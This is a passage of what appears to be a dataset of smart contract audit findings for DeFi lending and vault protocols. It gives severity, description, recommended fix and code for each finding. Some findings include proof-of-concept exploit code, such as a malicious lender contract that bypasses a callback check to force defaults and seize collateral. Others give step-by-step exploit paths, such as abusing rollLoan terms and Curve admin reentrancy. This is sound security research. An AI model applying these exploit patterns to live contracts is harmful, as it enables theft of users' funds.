idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n",See summary,"```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming ""In"", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get ""before"" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the ""out"" assets\\n // and get our ""in"" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256(""ERC3156FlashBorrower.onFlashLoan"")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n" +OOG / unexpected reverts due to incorrect usage of staticcall.,medium,"The function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 bits of the gas, and the entire 63/64 parts of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(""Gas before price1"", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(""price1"", price1);\\n emit log_named_uint(""Gas after price1 "", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.","According to the monorepo here, the staticall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.","This causes the contract to burn up 63/64 bits of gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simpe POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""forge-std/console.sol"";\\n\\nimport ""@openzeppelin/contracts/token/ERC20/ERC20.sol"";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20(""MyToken"", ""MTK"")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature(""hihi()""));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use this python scirpt to estimate how much gas is overpaid as lost of fund\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe lose on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in what the lowest amount of gas limit user that user can set the pay for withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 unit of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 unit of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 uint of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 100_00 transaction\\nso the total lost is 100_00 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 unit of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impact withdraw using top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, balancer reetrancy check is triggered to waste 63 / 64 waste in oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejected","```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(""Gas before price1"", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(""price1"", price1);\\n emit log_named_uint(""Gas after price1 "", gasleft());\\n }\\n```\\n" +Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for months,medium,"The contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between the deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over that 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new apr is given a weight of 10% and the older apr is given a weight of 90% as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9 day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming the correct APR of 6%, and an initial APR of 0%, we can calculate that it takes upto 28 updates to reflect close the correct APR. This transaltes to 84 days. So the wrong APR cann be shown for upto 3 months. Tha protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol would sub optimally allocate funds for months, losing potential yield.","It is recommended to initialize the APR with a specified value, rather than calculate it over the initial 9 days. 9 day window is not good enough to get an accurate APR, and can be easily manipulated by a slashing event.",The protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.,```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n +curve admin can drain pool via reentrancy (equal to execute emergency withdraw and rug tokenmak fund by third party),medium,"A few curve liquidity is pool is well in-scope:\\n```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n\\none of the pool is 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nAdmin of curve pools can easily drain curve pools via reentrancy or via the `withdraw_admin_fees` function.\\n```\\n@external\\ndef withdraw_admin_fees():\\n receiver: address = Factory(self.factory).get_fee_receiver(self)\\n\\n amount: uint256 = self.admin_balances[0]\\n if amount != 0:\\n raw_call(receiver, b"""", value=amount)\\n\\n amount = self.admin_balances[1]\\n if amount != 0:\\n assert ERC20(self.coins[1]).transfer(receiver, amount, default_return_value=True)\\n\\n self.admin_balances = empty(uint256[N_COINS])\\n```\\n\\nif admin of the curve can set a receiver to a malicious smart contract and reenter withdraw_admin_fees a 1000 times to drain the pool even the admin_balances is small\\nthe line of code\\n```\\nraw_call(receiver, b"""", value=amount)\\n```\\n\\ntrigger the reentrancy\\nThis is a problem because as stated by the tokemak team:\\nIn case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.\\nPausing or emergency withdrawals are not acceptable for Tokemak.\\nAs you can see above, pausing or emergency withdrawals are not acceptable, and this is possible for cuve pools so this is a valid issue according to the protocol and according to the read me",N/A,curve admins can drain pool via reentrancy,```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n +"At claimDefaulted, the lender may not receive the token because the Unclaimed token is not processed",high,"```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n\\nLoan data is deletead in `claimDefaulted` function. `loan.unclaimed` is not checked before data deletead. So, if `claimDefaulted` is called while there are unclaimed tokens, the lender will not be able to get the unclaimed tokens.","Process unclaimed tokens before deleting loan data.\\n```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n// Add the line below\\n claimRepaid(loanID_)\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n",Lender cannot get unclaimed token.,"```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n" +isCoolerCallback can be bypassed,high,"The `CoolerCallback.isCoolerCallback()` is intended to ensure that the lender implements the `CoolerCallback` abstract at line 241 when the parameter `isCallback_` is `true`.\\n```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n\\nHowever, this function doesn't provide any protection. The lender can bypass this check without implementing the `CoolerCallback` abstract by calling the `Cooler.clearRequest()` function using a contract that implements the `isCoolerCallback()` function and returns a `true` value.\\nFor example:\\n```\\ncontract maliciousLender {\\n function isCoolerCallback() pure returns(bool) {\\n return true;\\n }\\n \\n function operation(\\n address _to,\\n uint256 reqID_\\n ) public {\\n Cooler(_to).clearRequest(reqID_, true, true);\\n }\\n \\n function onDefault(uint256 loanID_, uint256 debt, uint256 collateral) public {}\\n}\\n```\\n\\nBy being the `loan.lender` with implement only `onDefault()` function, this will cause the `repayLoan()` and `rollLoan()` methods to fail due to revert at `onRepay()` and `onRoll()` function. The borrower cannot repay and the loan will be defaulted.\\nAfter the loan default, the attacker can execute `claimDefault()` to claim the collateral.\\nFurthermore, there is another method that allows lenders to bypass the `CoolerCallback.isCoolerCallback()` function which is loan ownership transfer.\\n```\\n/// @notice Approve transfer of loan ownership rights to a new address.\\n/// @param to_ address to be approved.\\n/// @param loanID_ index of loan in loans[].\\nfunction approveTransfer(address to_, uint256 loanID_) external {\\n if (msg.sender != loans[loanID_].lender) revert OnlyApproved();\\n\\n // Update transfer approvals.\\n approvals[loanID_] = to_;\\n}\\n\\n/// @notice Execute loan ownership transfer. Must be previously approved by the lender.\\n/// @param loanID_ index of loan in loans[].\\nfunction transferOwnership(uint256 loanID_) external {\\n if (msg.sender != approvals[loanID_]) revert OnlyApproved();\\n\\n // Update the load lender.\\n loans[loanID_].lender = msg.sender;\\n // Clear transfer approvals.\\n approvals[loanID_] = address(0);\\n}\\n```\\n\\nNormally, the lender who implements the `CoolerCallback` abstract may call the `Cooler.clearRequest()` with the `_isCoolerCallback` parameter set to `true` to execute logic when a loan is repaid, rolled, or defaulted.\\nBut the lender needs to change the owner of the loan, so they call the `approveTransfer()` and `transferOwnership()` functions to the contract that doesn't implement the `CoolerCallback` abstract (or implement only `onDefault()` function to force the loan default), but the `loan.callback` flag is still set to `true`.\\nThus, this breaks the business logic since the three callback functions don't need to be implemented when the `isCoolerCallback()` is set to `true` according to the dev note in the `CoolerCallback` abstract below:\\n/// @notice Allows for debt issuers to execute logic when a loan is repaid, rolled, or defaulted. /// @dev The three callback functions must be implemented if `isCoolerCallback()` is set to true.","Only allowing callbacks from the protocol-trusted address (eg., `Clearinghouse` contract).\\nDisable the transfer owner of the loan when the `loan.callback` is set to `true`.","The lender forced the Loan become default to get the collateral token, owner lost the collateral token.\\nBypass the `isCoolerCallback` validation.","```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n" +`emergency_shutdown` role is not enough for emergency shutdown.,medium,"Let's examine the function emergencyShutdown():\\n```\\nfunction emergencyShutdown() external onlyRole(""emergency_shutdown"") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n\\nThis has the modifier `onlyRole(""emergency_shutdown"")`. However, this also calls function `defund()`, which has the modifier `onlyRole(""cooler_overseer"")`\\n```\\nfunction defund(ERC20 token_, uint256 amount_) public onlyRole(""cooler_overseer"") {\\n```\\n\\nTherefore, the role `emergency_shutdown` will not have the ability to shutdown the protocol, unless it also has the overseer role.\\nTo get a coded PoC, make the following modifications to the test case:\\n```\\n//rolesAdmin.grantRole(""cooler_overseer"", overseer);\\nrolesAdmin.grantRole(""emergency_shutdown"", overseer);\\n```\\n\\nRun the following test command (to just run a single test test_emergencyShutdown()):\\n```\\nforge test --match-test test_emergencyShutdown\\n```\\n\\nThe test will fail with the `ROLES_RequireRole()` error.","There are two ways to mitigate this issue:\\nSeparate the logic for emergency shutdown and defunding. i.e. do not defund when emergency shutdown, but rather defund separately after shutdown.\\nMove the defunding logic to a separate internal function, so that emergency shutdown function can directly call defunding without going through a modifier.",`emergency_shutdown` role cannot emergency shutdown the protocol,"```\\nfunction emergencyShutdown() external onlyRole(""emergency_shutdown"") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n" +Lender is able to steal borrowers collateral by calling rollLoan with unfavourable terms on behalf of the borrower.,medium,"Say a user has 100 collateral tokens valued at $1,500 and they wish to borrow 1,000 debt tokens valued at $1,000 they would would call: (values have simplified for ease of math)\\n```\\nrequestLoan(""1,000 debt tokens"", ""5% interest"", ""10 loan tokens for each collateral"", ""1 year"")\\n```\\n\\nIf a lender then clears the request the borrower would expect to have 1 year to payback 1,050 debt tokens to be able to receive their collateral back.\\nHowever a lender is able to call provideNewTermsForRoll with whatever terms they wish: i.e.\\n```\\nprovideNewTermsForRoll(""loanID"", ""10000000% interest"", ""1000 loan tokens for each collateral"" , ""1 year"")\\n```\\n\\nThey can then follow this up with a call to rollLoan(loanID): During the rollLoan function the interest is recalculated using:\\n```\\n function interestFor(uint256 amount_, uint256 rate_, uint256 duration_) public pure returns (uint256) {\\n uint256 interest = (rate_ * duration_) / 365 days;\\n return (amount_ * interest) / DECIMALS_INTEREST;\\n }\\n```\\n\\nAs rate_ & duration_ are controllable by the borrower when they call provideNewTermsForRoll they can input a large number that the amount returned is much larger then the value of the collateral. i.e. input a rate_ of amount * 3 and duration of 365 days so that the interestFor returns 3,000.\\nThis amount gets added to the existing loan.amount and would make it too costly to ever repay as the borrower would have to spend more then the collateral is worth to get it back. i.e. borrower now would now need to send 4,050 debt tokens to receive their $1,500 worth of collateral back instead of the expected 1050.\\nThe extra amount should result in more collateral needing to be sent however it is calculated using loan.request.loanToCollateral which is also controlled by the lender when they call provideNewTermsForRoll, allowing them to input a value that will result in newCollateralFor returning 0 and no new collateral needing to be sent.\\n```\\n function newCollateralFor(uint256 loanID_) public view returns (uint256) {\\n Loan memory loan = loans[loanID_];\\n // Accounts for all outstanding debt (borrowed amount + interest).\\n uint256 neededCollateral = collateralFor(loan.amount, loan.request.loanToCollateral); \\n // Lender can force neededCollateral to always be less than loan.collateral\\n\\n return neededCollateral > loan.collateral ? neededCollateral - loan.collateral : 0;\\n }\\n```\\n\\nAs a result a borrower who was expecting to have repay 1050 tokens to get back their collateral may now need to spend many multiples more of that and will just be forced to just forfeit their collateral to the lender.","Add a check restricting rollLoan to only be callable by the owner. i.e.:\\n```\\nfunction rollLoan(uint256 loanID_) external {\\n Loan memory loan = loans[loanID_];\\n \\n if (msg.sender != owner()) revert OnlyApproved();\\n```\\n\\nNote: unrelated but rollLoan is also missing its event should add:\\n```\\nfactory().newEvent(reqID_, CoolerFactory.Events.RollLoan, 0);\\n```\\n",Borrower will be forced to payback the loan at unfavourable terms or forfeit their collateral.,"```\\nrequestLoan(""1,000 debt tokens"", ""5% interest"", ""10 loan tokens for each collateral"", ""1 year"")\\n```\\n" +Stable BPT valuation is incorrect and can be exploited to cause protocol insolvency,high,"StableBPTOracle.sol#L48-L53\\n```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n\\nThe above block is used to calculate the price. Finding the min price of all assets in the pool then multiplying by the current rate of the pool. This is nearly identical to how stable curve LP is priced. Balancer pools are a bit different and this methodology is incorrect for them. Lets look at a current mainnet pool to see the problem. Take the wstETH/aETHc pool. Currently getRate() = 1.006. The lowest price is aETHc at 2,073.23. This values the LP at 2,085.66. The issue is that the LPs actual value is 1,870.67 (nearly 12% overvalued) which can be checked here.\\nOvervaluing the LP as such can cause protocol insolvency as the borrower can overborrow against the LP, leaving the protocol with bad debt.",Stable BPT oracles need to use a new pricing methodology,Protocol insolvency due to overborrowing,```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return 